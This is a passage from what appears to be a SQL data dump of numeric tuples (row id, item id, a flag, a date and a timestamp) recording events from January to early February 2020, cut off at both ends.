21:39:23'),(645,2609,1,'2020-01-01','2020-01-01 22:39:27'),(646,485,1,'2020-01-01','2020-01-01 22:59:30'),(647,80,1,'2020-01-02','2020-01-02 00:10:28'),(648,108,1,'2020-01-02','2020-01-02 00:39:48'),(649,2911,1,'2020-01-02','2020-01-02 00:55:57'),(650,2309,1,'2020-01-02','2020-01-02 00:59:55'),(651,80,1,'2020-01-02','2020-01-02 01:57:42'),(652,80,1,'2020-01-02','2020-01-02 02:19:47'),(653,80,1,'2020-01-02','2020-01-02 02:20:13'),(654,2813,1,'2020-01-02','2020-01-02 02:50:33'),(655,2801,1,'2020-01-02','2020-01-02 04:06:27'),(656,2658,1,'2020-01-02','2020-01-02 07:01:58'),(657,72,1,'2020-01-02','2020-01-02 07:22:12'),(658,2751,1,'2020-01-02','2020-01-02 11:04:09'),(659,2309,1,'2020-01-02','2020-01-02 14:25:28'),(660,80,1,'2020-01-02','2020-01-02 15:15:19'),(661,72,1,'2020-01-02','2020-01-02 16:56:27'),(662,2658,1,'2020-01-02','2020-01-02 17:26:13'),(663,2813,1,'2020-01-02','2020-01-02 18:06:43'),(664,80,1,'2020-01-02','2020-01-02 18:26:51'),(665,2309,1,'2020-01-02','2020-01-02 18:36:53'),(666,2609,1,'2020-01-02','2020-01-02 18:47:07'),(667,2911,1,'2020-01-02','2020-01-02 20:29:30'),(668,2751,1,'2020-01-02','2020-01-02 20:51:25'),(669,2801,1,'2020-01-02','2020-01-02 21:30:30'),(670,1600,1,'2020-01-02','2020-01-02 21:51:30'),(671,1726,1,'2020-01-02','2020-01-02 22:01:47'),(672,1782,1,'2020-01-02','2020-01-02 22:50:59'),(673,76,1,'2020-01-02','2020-01-02 23:51:10'),(674,80,1,'2020-01-03','2020-01-03 00:31:49'),(675,1697,1,'2020-01-03','2020-01-03 01:52:10'),(676,72,1,'2020-01-03','2020-01-03 02:42:39'),(677,2911,1,'2020-01-03','2020-01-03 03:21:12'),(678,2658,1,'2020-01-03','2020-01-03 03:22:38'),(679,2813,1,'2020-01-03','2020-01-03 04:32:38'),(680,80,1,'2020-01-03','2020-01-03 05:42:47'),(681,2751,1,'2020-01-03','2020-01-03 06:43:27'),(682,2309,1,'2020-01-03','2020-01-03 06:53:28'),(683,2609,1,'2020-01-03','2020-01-03 07:03:50'),(684,2801,1,'2020-01-03','2020-01-03 08:12:27'),(685,80,1,'2020-01-03','2020-01-03 09:24:38'),(686,2309,1,'2020-01-03','2020-01-03 09:48:45'),(687,472,1,'2020-01-03','2020-01-03 11:35:20'),(688,72,1,'2020-01-03','2020-01-03 11:39:14'),(689,2911,1,'2020-01-03','2020-01-03 12:05:28'),(690,2658,1,'2020-01-03','2020-01-03 12:16:20'),(691,1751,1,'2020-01-03','2020-01-03 12:25:19'),(692,1872,1,'2020-01-03','2020-01-03 12:45:28'),(693,2813,1,'2020-01-03','2020-01-03 13:46:32'),(694,80,1,'2020-01-03','2020-01-03 14:16:50'),(695,476,1,'2020-01-03','2020-01-03 14:27:07'),(696,2751,1,'2020-01-03','2020-01-03 15:07:19'),(697,2309,1,'2020-01-03','2020-01-03 15:17:17'),(698,1774,1,'2020-01-03','2020-01-03 15:38:22'),(699,2609,1,'2020-01-03','2020-01-03 17:02:47'),(700,2801,1,'2020-01-03','2020-01-03 17:22:46'),(701,2309,1,'2020-01-03','2020-01-03 18:43:47'),(702,1718,1,'2020-01-03','2020-01-03 18:53:47'),(703,481,1,'2020-01-03','2020-01-03 19:53:38'),(704,72,1,'2020-01-03','2020-01-03 20:35:11'),(705,91,1,'2020-01-03','2020-01-03 20:43:55'),(706,2150,1,'2020-01-03','2020-01-03 21:04:18'),(707,2658,1,'2020-01-03','2020-01-03 21:24:37'),(708,2751,1,'2020-01-04','2020-01-04 00:16:03'),(709,2309,1,'2020-01-04','2020-01-04 03:36:25'),(710,80,1,'2020-01-04','2020-01-04 04:52:26'),(711,2911,1,'2020-01-04','2020-01-04 06:03:35'),(712,2813,1,'2020-01-04','2020-01-04 06:13:36'),(713,80,1,'2020-01-04','2020-01-04 06:43:38'),(714,2309,1,'2020-01-04','2020-01-04 07:14:10'),(715,72,1,'2020-01-04','2020-01-04 08:04:43'),(716,2658,1,'2020-01-04','2020-01-04 09:28:26'),(717,2751,1,'2020-01-04','2020-01-04 10:29:24'),(718,2609,1,'2020-01-04','2020-01-04 10:49:49'),(719,2801,1,'2020-01-04','2020-01-04 12:04:34'),(720,2309,1,'2020-01-04','2020-01-04 12:10:01'),(721,474,1,'2020-01-04','2020-01-04 12:50:02'),(722,80,1,'2020-01-04','2020-01-04 13:10:19'),(723,1699,1,'2020-01-04','2020-01-04 14:11:07'),(724,2911,1,'2020-01-04','2020-01-04 15:31:03'),(725,2813,1,'2020-01-04','2020-01-04 15:41:26'),(726,2309,1,'2020-01-04','2020-01-04 16:31:52'),(727,72,1,'2020-01-04','2020-01-04 17:42:01'),(728,2658,1,'2020-01-04','2020-01-04 18:22:26'),(729,2309,1,'2020-01-04','2020-01-04 21:21:11'),(730,80,1,'2020-01-04','2020-01-04 22:51:46'),(731,2751,1,'2020-01-04','2020-01-04 23:41:15'),(732,2911,1,'2020-01-05','2020-01-05 01:07:49'),(733,72,1,'2020-01-05','2020-01-05 05:44:24'),(734,2309,1,'2020-01-05','2020-01-05 06:34:52'),(735,2658,1,'2020-01-05','2020-01-05 06:44:50'),(736,2813,1,'2020-01-05','2020-01-05 06:55:04'),(737,80,1,'2020-01-05','2020-01-05 07:25:08'),(738,80,1,'2020-01-05','2020-01-05 07:35:11'),(739,2804,1,'2020-01-05','2020-01-05 07:40:42'),(740,2309,1,'2020-01-05','2020-01-05 07:45:26'),(741,2751,1,'2020-01-05','2020-01-05 09:05:58'),(742,2911,1,'2020-01-05','2020-01-05 11:47:33'),(743,2609,1,'2020-01-05','2020-01-05 11:48:06'),(744,2609,1,'2020-01-05','2020-01-05 12:28:23'),(745,2801,1,'2020-01-05','2020-01-05 12:38:16'),(746,1590,1,'2020-01-05','2020-01-05 12:58:22'),(747,1722,1,'2020-01-05','2020-01-05 13:18:16'),(748,1715,1,'2020-01-05','2020-01-05 13:28:27'),(749,72,1,'2020-01-05','2020-01-05 14:59:36'),(750,2309,1,'2020-01-05','2020-01-05 15:44:13'),(751,2658,1,'2020-01-05','2020-01-05 15:54:13'),(752,80,1,'2020-01-05','2020-01-05 16:14:21'),(753,2813,1,'2020-01-05','2020-01-05 18:05:29'),(754,2751,1,'2020-01-05','2020-01-05 19:46:03'),(755,2609,1,'2020-01-05','2020-01-05 20:05:06'),(756,2911,1,'2020-01-05','2020-01-05 20:50:21'),(757,2309,1,'2020-01-06','2020-01-06 00:17:01'),(758,72,1,'2020-01-06','2020-01-06 00:47:01'),(759,80,1,'2020-01-06','2020-01-06 01:17:18'),(760,2658,1,'2020-01-06','2020-01-06 01:26:58'),(761,80,1,'2020-01-06','2020-01-06 01:37:06'),(762,2813,1,'2020-01-06','2020-01-06 03:35:55'),(763,2751,1,'2020-01-06','2020-01-06 04:26:13'),(764,2911,1,'2020-01-06','2020-01-06 05:19:29'),(765,2609,1,'2020-01-06','2020-01-06 06:16:30'),(766,470,1,'2020-01-06','2020-01-06 06:36:30'),(767,2801,1,'2020-01-06','2020-01-06 06:56:49'),(768,2309,1,'2020-01-06','2020-01-06 10:13:04'),(769,80,1,'2020-01-06','2020-01-06 10:23:29'),(770,72,1,'2020-01-06','2020-01-06 10:32:59'),(771,2658,1,'2020-01-06','2020-01-06 11:33:07'),(772,2813,1,'2020-01-06','2020-01-06 12:43:58'),(773,2751,1,'2020-01-06','2020-01-06 13:34:10'),(774,80,1,'2020-01-06','2020-01-06 13:44:18'),(775,2309,1,'2020-01-06','2020-01-06 13:54:18'),(776,2911,1,'2020-01-06','2020-01-06 14:24:28'),(777,483,1,'2020-01-06','2020-01-06 17:09:16'),(778,471,1,'2020-01-06','2020-01-06 17:12:47'),(779,2165,1,'2020-01-06','2020-01-06 17:22:46'),(780,2159,1,'2020-01-06','2020-01-06 17:45:58'),(781,1582,1,'2020-01-06','2020-01-06 17:56:08'),(782,1713,1,'2020-01-06','2020-01-06 18:26:21'),(783,1713,1,'2020-01-06','2020-01-06 18:44:12'),(784,1604,1,'2020-01-06','2020-01-06 18:49:29'),(785,72,1,'2020-01-06','2020-01-06 23:01:20'),(786,2309,1,'2020-01-06','2020-01-06 23:52:43'),(787,2904,1,'2020-01-06','2020-01-06 23:55:36'),(788,80,1,'2020-01-07','2020-01-07 00:05:32'),(789,2609,1,'2020-01-07','2020-01-07 00:18:24'),(790,2751,1,'2020-01-07','2020-01-07 01:15:39'),(791,2911,1,'2020-01-07','2020-01-07 01:27:05'),(792,2658,1,'2020-01-07','2020-01-07 02:06:11'),(793,80,1,'2020-01-07','2020-01-07 02:26:21'),(794,2609,1,'2020-01-07','2020-01-07 02:36:01'),(795,2309,1,'2020-01-07','2020-01-07 05:57:06'),(796,2609,1,'2020-01-07','2020-01-07 06:07:09'),(797,484,1,'2020-01-07','2020-01-07 06:37:22'),(798,72,1,'2020-01-07','2020-01-07 08:36:53'),(799,2309,1,'2020-01-07','2020-01-07 10:58:42'),(800,2658,1,'2020-01-07','2020-01-07 11:30:09'),(801,80,1,'2020-01-07','2020-01-07 11:38:46'),(802,2813,1,'2020-01-07','2020-01-07 11:52:53'),(803,2609,1,'2020-01-07','2020-01-07 15:50:06'),(804,2309,1,'2020-01-07','2020-01-07 21:51:37'),(805,2309,1,'2020-01-07','2020-01-07 23:31:54'),(806,72,1,'2020-01-08','2020-01-08 06:16:02'),(807,2309,1,'2020-01-08','2020-01-08 10:49:38'),(808,108,1,'2020-01-08','2020-01-08 11:33:41'),(809,2658,1,'2020-01-08','2020-01-08 12:51:25'),(810,80,1,'2020-01-08','2020-01-08 13:31:34'),(811,74,1,'2020-01-08','2020-01-08 15:24:01'),(812,72,1,'2020-01-08','2020-01-08 16:01:24'),(813,2813,1,'2020-01-08','2020-01-08 17:52:12'),(814,2801,1,'2020-01-08','2020-01-08 19:00:50'),(815,2658,1,'2020-01-09','2020-01-09 02:17:29'),(816,2813,1,'2020-01-09','2020-01-09 02:52:30'),(817,2801,1,'2020-01-09','2020-01-09 03:42:22'),(818,2658,1,'2020-01-09','2020-01-09 19:35:07'),(819,2813,1,'2020-01-09','2020-01-09 19:45:13'),(820,80,1,'2020-01-09','2020-01-09 20:25:21'),(821,2801,1,'2020-01-09','2020-01-09 20:45:24'),(822,2813,1,'2020-01-10','2020-01-10 04:38:47'),(823,80,1,'2020-01-10','2020-01-10 06:24:13'),(824,2658,1,'2020-01-10','2020-01-10 07:51:38'),(825,2801,1,'2020-01-10','2020-01-10 08:21:57'),(826,2813,1,'2020-01-10','2020-01-10 14:12:23'),(827,2658,1,'2020-01-10','2020-01-10 15:38:04'),(828,80,1,'2020-01-10','2020-01-10 16:22:29'),(829,2658,1,'2020-01-10','2020-01-10 16:42:28'),(830,2801,1,'2020-01-10','2020-01-10 17:22:35'),(831,2801,1,'2020-01-10','2020-01-10 20:49:51'),(832,2309,1,'2020-01-10','2020-01-10 22:33:31'),(833,2813,1,'2020-01-10','2020-01-10 22:54:05'),(834,80,1,'2020-01-11','2020-01-11 00:59:43'),(835,2609,1,'2020-01-11','2020-01-11 02:59:40'),(836,2658,1,'2020-01-11','2020-01-11 03:30:11'),(837,2813,1,'2020-01-11','2020-01-11 07:42:03'),(838,2609,1,'2020-01-11','2020-01-11 13:03:17'),(839,2658,1,'2020-01-11','2020-01-11 13:33:14'),(840,2813,1,'2020-01-11','2020-01-11 18:34:36'),(841,2609,1,'2020-01-11','2020-01-11 19:35:19'),(842,1598,1,'2020-01-11','2020-01-11 20:24:55'),(843,2609,1,'2020-01-12','2020-01-12 01:32:09'),(844,2609,1,'2020-01-12','2020-01-12 01:34:23'),(845,80,1,'2020-01-12','2020-01-12 02:42:06'),(846,80,1,'2020-01-12','2020-01-12 02:48:57'),(847,2658,1,'2020-01-12','2020-01-12 04:54:52'),(848,2911,1,'2020-01-12','2020-01-12 05:51:52'),(849,2751,1,'2020-01-12','2020-01-12 06:11:48'),(850,2609,1,'2020-01-12','2020-01-12 11:44:17'),(851,2813,1,'2020-01-12','2020-01-12 13:44:52'),(852,2658,1,'2020-01-12','2020-01-12 13:54:48'),(853,2911,1,'2020-01-12','2020-01-12 15:15:07'),(854,2751,1,'2020-01-12','2020-01-12 17:36:51'),(855,2609,1,'2020-01-12','2020-01-12 20:17:43'),(856,2609,1,'2020-01-12','2020-01-12 20:47:29'),(857,2911,1,'2020-01-13','2020-01-13 02:29:03'),(858,2751,1,'2020-01-13','2020-01-13 03:19:20'),(859,2658,1,'2020-01-13','2020-01-13 04:19:52'),(860,2813,1,'2020-01-13','2020-01-13 05:10:27'),(861,2609,1,'2020-01-13','2020-01-13 05:20:28'),(862,2801,1,'2020-01-13','2020-01-13 07:51:35'),(863,335,1,'2020-01-13','2020-01-13 09:12:04'),(864,68,1,'2020-01-13','2020-01-13 12:33:39'),(865,2751,1,'2020-01-13','2020-01-13 13:13:42'),(866,89,1,'2020-01-13','2020-01-13 13:53:47'),(867,335,1,'2020-01-13','2020-01-13 18:04:01'),(868,2309,1,'2020-01-13','2020-01-13 21:19:49'),(869,2658,1,'2020-01-13','2020-01-13 22:10:06'),(870,89,1,'2020-01-13','2020-01-13 23:30:47'),(871,2813,1,'2020-01-13','2020-01-13 23:53:16'),(872,2911,1,'2020-01-14','2020-01-14 01:10:55'),(873,2751,1,'2020-01-14','2020-01-14 01:21:08'),(874,68,1,'2020-01-14','2020-01-14 01:30:54'),(875,2309,1,'2020-01-14','2020-01-14 01:51:07'),(876,335,1,'2020-01-14','2020-01-14 02:51:05'),(877,2751,1,'2020-01-14','2020-01-14 03:39:23'),(878,1544,1,'2020-01-14','2020-01-14 04:02:05'),(879,2609,1,'2020-01-14','2020-01-14 04:11:33'),(880,2309,1,'2020-01-14','2020-01-14 06:21:21'),(881,89,1,'2020-01-14','2020-01-14 08:31:52'),(882,2658,1,'2020-01-14','2020-01-14 09:11:44'),(883,2813,1,'2020-01-14','2020-01-14 09:39:18'),(884,335,1,'2020-01-14','2020-01-14 11:49:36'),(885,68,1,'2020-01-14','2020-01-14 11:59:26'),(886,1701,1,'2020-01-14','2020-01-14 12:09:28'),(887,89,1,'2020-01-14','2020-01-14 12:19:56'),(888,1730,1,'2020-01-14','2020-01-14 12:29:39'),(889,1592,1,'2020-01-14','2020-01-14 13:56:21'),(890,2309,1,'2020-01-14','2020-01-14 14:40:16'),(891,84,1,'2020-01-14','2020-01-14 15:10:33'),(892,108,1,'2020-01-14','2020-01-14 16:04:27'),(893,2658,1,'2020-01-14','2020-01-14 16:54:03'),(894,1709,1,'2020-01-14','2020-01-14 16:55:18'),(895,1606,1,'2020-01-14','2020-01-14 17:45:46'),(896,108,1,'2020-01-15','2020-01-15 03:00:42'),(897,1606,1,'2020-01-15','2020-01-15 03:10:23'),(898,1709,1,'2020-01-15','2020-01-15 03:39:29'),(899,2609,1,'2020-01-15','2020-01-15 10:58:19'),(900,108,1,'2020-01-15','2020-01-15 12:53:00'),(901,1606,1,'2020-01-15','2020-01-15 13:13:13'),(902,1709,1,'2020-01-15','2020-01-15 13:53:24'),(903,80,1,'2020-01-16','2020-01-16 13:15:45'),(904,91,1,'2020-01-16','2020-01-16 13:16:24'),(905,1695,1,'2020-01-16','2020-01-16 13:16:52'),(906,91,1,'2020-01-16','2020-01-16 13:17:07'),(907,2751,1,'2020-01-16','2020-01-16 13:17:33'),(908,91,1,'2020-01-16','2020-01-16 13:17:58'),(909,570,1,'2020-01-16','2020-01-16 13:21:39'),(910,74,1,'2020-01-17','2020-01-17 00:29:43'),(911,2503,1,'2020-01-17','2020-01-17 00:31:07'),(912,2503,1,'2020-01-17','2020-01-17 00:34:09'),(913,76,1,'2020-01-17','2020-01-17 00:52:15'),(914,108,1,'2020-01-17','2020-01-17 12:39:35'),(915,1730,1,'2020-01-18','2020-01-18 15:59:14'),(916,1730,1,'2020-01-18','2020-01-18 15:59:15'),(917,1730,1,'2020-01-18','2020-01-18 15:59:18'),(918,1730,1,'2020-01-18','2020-01-18 15:59:18'),(919,1730,1,'2020-01-18','2020-01-18 15:59:27'),(920,1730,1,'2020-01-18','2020-01-18 16:01:34'),(921,80,1,'2020-01-20','2020-01-20 11:28:00'),(922,89,1,'2020-01-20','2020-01-20 11:32:34'),(923,2904,1,'2020-01-21','2020-01-21 14:20:50'),(924,2904,1,'2020-01-21','2020-01-21 14:21:17'),(925,89,1,'2020-01-21','2020-01-21 14:46:47'),(926,1598,1,'2020-01-21','2020-01-21 14:47:38'),(927,473,1,'2020-01-21','2020-01-21 15:26:04'),(928,1730,1,'2020-01-21','2020-01-21 15:32:29'),(929,89,1,'2020-01-21','2020-01-21 16:38:53'),(930,1588,1,'2020-01-21','2020-01-21 16:39:35'),(931,2609,1,'2020-01-21','2020-01-21 17:37:38'),(932,1730,1,'2020-01-21','2020-01-21 22:54:56'),(933,2801,1,'2020-01-22','2020-01-22 11:18:51'),(934,74,1,'2020-01-22','2020-01-22 11:22:25'),(935,72,1,'2020-01-22','2020-01-22 11:24:32'),(936,1730,1,'2020-01-22','2020-01-22 13:07:27'),(937,1730,1,'2020-01-22','2020-01-22 22:53:12'),(938,1730,1,'2020-01-22','2020-01-22 23:16:11'),(939,1730,1,'2020-01-22','2020-01-22 23:16:55'),(940,1730,1,'2020-01-23','2020-01-23 08:22:05'),(941,1730,1,'2020-01-23','2020-01-23 11:32:57'),(942,1730,1,'2020-01-23','2020-01-23 16:35:00'),(943,1730,1,'2020-01-23','2020-01-23 17:46:29'),(944,1730,1,'2020-01-23','2020-01-23 19:53:19'),(945,1730,1,'2020-01-23','2020-01-23 20:05:52'),(946,1730,1,'2020-01-23','2020-01-23 20:08:53'),(947,1730,1,'2020-01-23','2020-01-23 21:00:48'),(948,1730,1,'2020-01-23','2020-01-23 21:48:07'),(949,1730,1,'2020-01-24','2020-01-24 05:05:00'),(950,1730,1,'2020-01-24','2020-01-24 05:09:43'),(951,1730,1,'2020-01-24','2020-01-24 05:10:55'),(952,1730,1,'2020-01-24','2020-01-24 05:11:18'),(953,89,1,'2020-01-24','2020-01-24 08:41:51'),(954,1730,1,'2020-01-24','2020-01-24 09:04:22'),(955,1722,1,'2020-01-24','2020-01-24 12:20:30'),(956,80,1,'2020-01-25','2020-01-25 06:26:19'),(957,72,1,'2020-01-25','2020-01-25 06:36:12'),(958,2309,1,'2020-01-25','2020-01-25 08:07:39'),(959,89,1,'2020-01-25','2020-01-25 12:18:16'),(960,335,1,'2020-01-25','2020-01-25 13:08:33'),(961,1730,1,'2020-01-25','2020-01-25 15:40:41'),(962,80,1,'2020-01-25','2020-01-25 17:25:50'),(963,2609,1,'2020-01-25','2020-01-25 18:15:18'),(964,1730,1,'2020-01-25','2020-01-25 21:28:12'),(965,108,1,'2020-01-26','2020-01-26 17:54:27'),(966,1606,1,'2020-01-26','2020-01-26 19:35:28'),(967,1774,1,'2020-01-27','2020-01-27 03:18:04'),(968,108,1,'2020-01-27','2020-01-27 04:19:38'),(969,1606,1,'2020-01-27','2020-01-27 06:49:54'),(970,1604,1,'2020-01-27','2020-01-27 08:51:11'),(971,1604,1,'2020-01-27','2020-01-27 08:52:12'),(972,1730,1,'2020-01-27','2020-01-27 09:14:51'),(973,1730,1,'2020-01-27','2020-01-27 09:14:52'),(974,1730,1,'2020-01-27','2020-01-27 09:14:53'),(975,1730,1,'2020-01-27','2020-01-27 09:14:57'),(976,1730,1,'2020-01-27','2020-01-27 09:14:57'),(977,1709,1,'2020-01-27','2020-01-27 11:00:52'),(978,2309,1,'2020-01-27','2020-01-27 13:16:13'),(979,80,1,'2020-01-27','2020-01-27 16:57:00'),(980,1730,1,'2020-01-28','2020-01-28 02:29:00'),(981,89,1,'2020-01-28','2020-01-28 07:12:18'),(982,2751,1,'2020-01-28','2020-01-28 13:24:37'),(983,2309,1,'2020-01-28','2020-01-28 17:24:32'),(984,84,1,'2020-01-28','2020-01-28 17:40:47'),(985,87,1,'2020-01-28','2020-01-28 17:42:38'),(986,89,1,'2020-01-28','2020-01-28 17:45:16'),(987,1586,1,'2020-01-28','2020-01-28 17:47:48'),(988,91,1,'2020-01-28','2020-01-28 17:50:53'),(989,89,1,'2020-01-28','2020-01-28 17:59:12'),(990,1582,1,'2020-01-28','2020-01-28 17:59:24'),(991,2309,1,'2020-01-28','2020-01-28 22:48:51'),(992,2309,1,'2020-01-29','2020-01-29 01:52:01'),(993,1582,1,'2020-01-29','2020-01-29 09:33:18'),(994,1772,1,'2020-01-29','2020-01-29 12:38:21'),(995,87,1,'2020-01-29','2020-01-29 12:43:44'),(996,471,1,'2020-01-29','2020-01-29 12:44:13'),(997,91,1,'2020-01-29','2020-01-29 12:44:38'),(998,80,1,'2020-01-29','2020-01-29 14:08:02'),(999,91,1,'2020-01-29','2020-01-29 14:28:26'),(1000,2503,1,'2020-01-29','2020-01-29 15:36:15'),(1001,87,1,'2020-01-29','2020-01-29 15:36:49'),(1002,87,1,'2020-01-29','2020-01-29 15:54:22'),(1003,474,1,'2020-01-29','2020-01-29 15:55:28'),(1004,68,1,'2020-01-29','2020-01-29 16:54:08'),(1005,1600,1,'2020-01-29','2020-01-29 21:11:01'),(1006,2751,1,'2020-01-30','2020-01-30 15:37:32'),(1007,2609,1,'2020-01-31','2020-01-31 11:44:51'),(1008,2609,1,'2020-01-31','2020-01-31 11:45:33'),(1009,1604,1,'2020-01-31','2020-01-31 13:44:00'),(1010,1604,1,'2020-01-31','2020-01-31 13:44:13'),(1011,1588,1,'2020-01-31','2020-01-31 15:18:21'),(1012,1726,1,'2020-01-31','2020-01-31 15:28:31'),(1013,1726,1,'2020-01-31','2020-01-31 15:29:22'),(1014,1588,1,'2020-01-31','2020-01-31 15:29:29'),(1015,1582,1,'2020-02-01','2020-02-01 02:32:44'),(1016,1588,1,'2020-02-01','2020-02-01 13:47:41'),(1017,84,1,'2020-02-01','2020-02-01 13:52:27'),(1018,1588,1,'2020-02-01','2020-02-01 13:52:53'),(1019,2309,1,'2020-02-02','2020-02-02 00:24:52'),(1020,80,1,'2020-02-02','2020-02-02 00:33:46'),(1021,2911,1,'2020-02-02','2020-02-02 04:26:15'),(1022,2813,1,'2020-02-02','2020-02-02 04:56:20'),(1023,335,1,'2020-02-02','2020-02-02 06:37:22'),(1024,2609,1,'2020-02-02','2020-02-02 08:08:15'),(1025,2309,1,'2020-02-02','2020-02-02 09:47:24'),(1026,80,1,'2020-02-02','2020-02-02 10:09:49'),(1027,2751,1,'2020-02-02','2020-02-02 12:29:58'),(1028,89,1,'2020-02-02','2020-02-02 12:33:45'),(1029,2751,1,'2020-02-02','2020-02-02 12:35:34'),(1030,68,1,'2020-02-02','2020-02-02 12:43:47'),(1031,72,1,'2020-02-02','2020-02-02 16:14:56'),(1032,1594,1,'2020-02-02','2020-02-02 16:45:21'),(1033,80,1,'2020-02-02','2020-02-02 17:05:28'),(1034,108,1,'2020-02-02','2020-02-02 17:09:45'),(1035,2609,1,'2020-02-02','2020-02-02 17:25:52'),(1036,2309,1,'2020-02-02','2020-02-02 18:06:02'),(1037,335,1,'2020-02-02','2020-02-02 18:35:55'),(1038,2309,1,'2020-02-02','2020-02-02 21:36:30'),(1039,2309,1,'2020-02-02','2020-02-02 21:45:08'),(1040,80,1,'2020-02-02','2020-02-02 22:17:17'),(1041,89,1,'2020-02-03','2020-02-03 00:47:38'),(1042,68,1,'2020-02-03','2020-02-03 01:48:23'),(1043,2609,1,'2020-02-03','2020-02-03 02:48:45'),(1044,2309,1,'2020-02-03','2020-02-03 03:08:52'),(1045,335,1,'2020-02-03','2020-02-03 04:29:46'),(1046,72,1,'2020-02-03','2020-02-03 05:40:15'),(1047,2309,1,'2020-02-03','2020-02-03 07:20:45'),(1048,80,1,'2020-02-03','2020-02-03 07:40:58'),(1049,474,1,'2020-02-03','2020-02-03 08:40:19'),(1050,2813,1,'2020-02-03','2020-02-03 09:31:26'),(1051,2309,1,'2020-02-03','2020-02-03 11:26:30'),(1052,80,1,'2020-02-03','2020-02-03 11:27:37'),(1053,335,1,'2020-02-03','2020-02-03 13:22:59'),(1054,89,1,'2020-02-03','2020-02-03 14:03:35'),(1055,72,1,'2020-02-03','2020-02-03 15:04:20'),(1056,80,1,'2020-02-03','2020-02-03 15:40:45'),(1057,2801,1,'2020-02-03','2020-02-03 15:46:57'),(1058,2609,1,'2020-02-03','2020-02-03 16:12:09'),(1059,108,1,'2020-02-03','2020-02-03 17:03:06'),(1060,80,1,'2020-02-03','2020-02-03 17:15:42'),(1061,108,1,'2020-02-03','2020-02-03 17:15:49'),(1062,76,1,'2020-02-03','2020-02-03 17:18:59'),(1063,2813,1,'2020-02-03','2020-02-03 20:17:24'),(1064,1596,1,'2020-02-04','2020-02-04 06:12:58'),(1065,1596,1,'2020-02-04','2020-02-04 08:22:15'),(1066,84,1,'2020-02-04','2020-02-04 13:50:44'),(1067,2609,1,'2020-02-04','2020-02-04 19:15:30'),(1068,2309,1,'2020-02-05','2020-02-05 11:02:37'),(1069,80,1,'2020-02-05','2020-02-05 11:22:06'),(1070,80,1,'2020-02-05','2020-02-05 19:42:13'),(1071,1588,1,'2020-02-05','2020-02-05 20:23:53'),(1072,76,1,'2020-02-05','2020-02-05 20:24:59'),(1073,91,1,'2020-02-05','2020-02-05 20:25:31'),(1074,89,1,'2020-02-05','2020-02-05 20:32:29'),(1075,1606,1,'2020-02-05','2020-02-05 20:32:47'),(1076,1588,1,'2020-02-05','2020-02-05 20:33:19'),(1077,2309,1,'2020-02-05','2020-02-05 22:55:28'),(1078,2609,1,'2020-02-05','2020-02-05 23:15:28'),(1079,335,1,'2020-02-06','2020-02-06 01:15:08'),(1080,2309,1,'2020-02-06','2020-02-06 01:45:45'),(1081,2813,1,'2020-02-06','2020-02-06 02:05:25'),(1082,74,1,'2020-02-06','2020-02-06 09:04:41'),(1083,2309,1,'2020-02-06','2020-02-06 09:07:38'),(1084,74,1,'2020-02-06','2020-02-06 09:18:11'),(1085,80,1,'2020-02-06','2020-02-06 09:19:26'),(1086,2309,1,'2020-02-06','2020-02-06 11:54:31'),(1087,2309,1,'2020-02-06','2020-02-06 11:54:32'),(1088,2309,1,'2020-02-06','2020-02-06 11:54:40'),(1089,2309,1,'2020-02-06','2020-02-06 11:54:40'),(1090,80,1,'2020-02-06','2020-02-06 13:09:27'),(1091,2911,1,'2020-02-06','2020-02-06 13:41:55'),(1092,2801,1,'2020-02-06','2020-02-06 13:42:15'),(1093,2956,1,'2020-02-06','2020-02-06 13:54:56'),(1094,72,1,'2020-02-06','2020-02-06 14:01:59'),(1095,2956,1,'2020-02-06','2020-02-06 15:00:17'),(1096,2309,1,'2020-02-06','2020-02-06 16:06:06'),(1097,2609,1,'2020-02-06','2020-02-06 17:00:53'),(1098,2609,1,'2020-02-06','2020-02-06 17:30:58'),(1099,89,1,'2020-02-06','2020-02-06 17:51:31'),(1100,2309,1,'2020-02-06','2020-02-06 18:51:27'),(1101,80,1,'2020-02-06','2020-02-06 18:54:47'),(1102,2904,1,'2020-02-07','2020-02-07 05:31:01'),(1103,487,1,'2020-02-07','2020-02-07 05:33:48'),(1104,84,1,'2020-02-07','2020-02-07 05:36:29'),(1105,87,1,'2020-02-07','2020-02-07 05:43:00'),(1106,488,1,'2020-02-07','2020-02-07 05:43:36'),(1107,89,1,'2020-02-07','2020-02-07 05:44:33'),(1108,1586,1,'2020-02-07','2020-02-07 05:45:31'),(1109,89,1,'2020-02-07','2020-02-07 05:50:02'),(1110,1608,1,'2020-02-07','2020-02-07 05:50:15'),(1111,1749,1,'2020-02-07','2020-02-07 05:52:54'),(1112,91,1,'2020-02-07','2020-02-07 05:54:05'),(1113,91,1,'2020-02-07','2020-02-07 08:52:07'),(1114,72,1,'2020-02-07','2020-02-07 08:56:00'),(1115,335,1,'2020-02-07','2020-02-07 08:56:43'),(1116,335,1,'2020-02-07','2020-02-07 08:57:03'),(1117,108,1,'2020-02-07','2020-02-07 09:00:00'),(1118,80,1,'2020-02-07','2020-02-07 09:00:39'),(1119,80,1,'2020-02-07','2020-02-07 09:02:53'),(1120,2395,1,'2020-02-07','2020-02-07 09:03:33'),(1121,2410,1,'2020-02-07','2020-02-07 09:04:00'),(1122,1588,1,'2020-02-07','2020-02-07 12:07:18'),(1123,84,1,'2020-02-07','2020-02-07 12:08:58'),(1124,1872,1,'2020-02-07','2020-02-07 12:10:03'),(1125,84,1,'2020-02-07','2020-02-07 12:11:29'),(1126,87,1,'2020-02-07','2020-02-07 14:02:31'),(1127,87,1,'2020-02-07','2020-02-07 15:05:22'),(1128,488,1,'2020-02-07','2020-02-07 15:05:39'),(1129,2609,1,'2020-02-07','2020-02-07 17:23:57'),(1130,2503,1,'2020-02-08','2020-02-08 03:10:07'),(1131,2309,1,'2020-02-08','2020-02-08 04:38:12'),(1132,87,1,'2020-02-08','2020-02-08 09:45:02'),(1133,80,1,'2020-02-08','2020-02-08 09:45:27'),(1134,2309,1,'2020-02-08','2020-02-08 09:50:47'),(1135,1586,1,'2020-02-08','2020-02-08 13:31:41'),(1136,80,1,'2020-02-08','2020-02-08 15:31:09'),(1137,2609,1,'2020-02-08','2020-02-08 16:41:39'),(1138,2309,1,'2020-02-08','2020-02-08 17:01:49'),(1139,335,1,'2020-02-08','2020-02-08 17:23:42'),(1140,2751,1,'2020-02-08','2020-02-08 17:41:09'),(1141,2309,1,'2020-02-08','2020-02-08 18:21:05'),(1142,1730,1,'2020-02-08','2020-02-08 19:41:07'),(1143,72,1,'2020-02-08','2020-02-08 20:11:50'),(1144,89,1,'2020-02-08','2020-02-08 22:51:43'),(1145,2813,1,'2020-02-09','2020-02-09 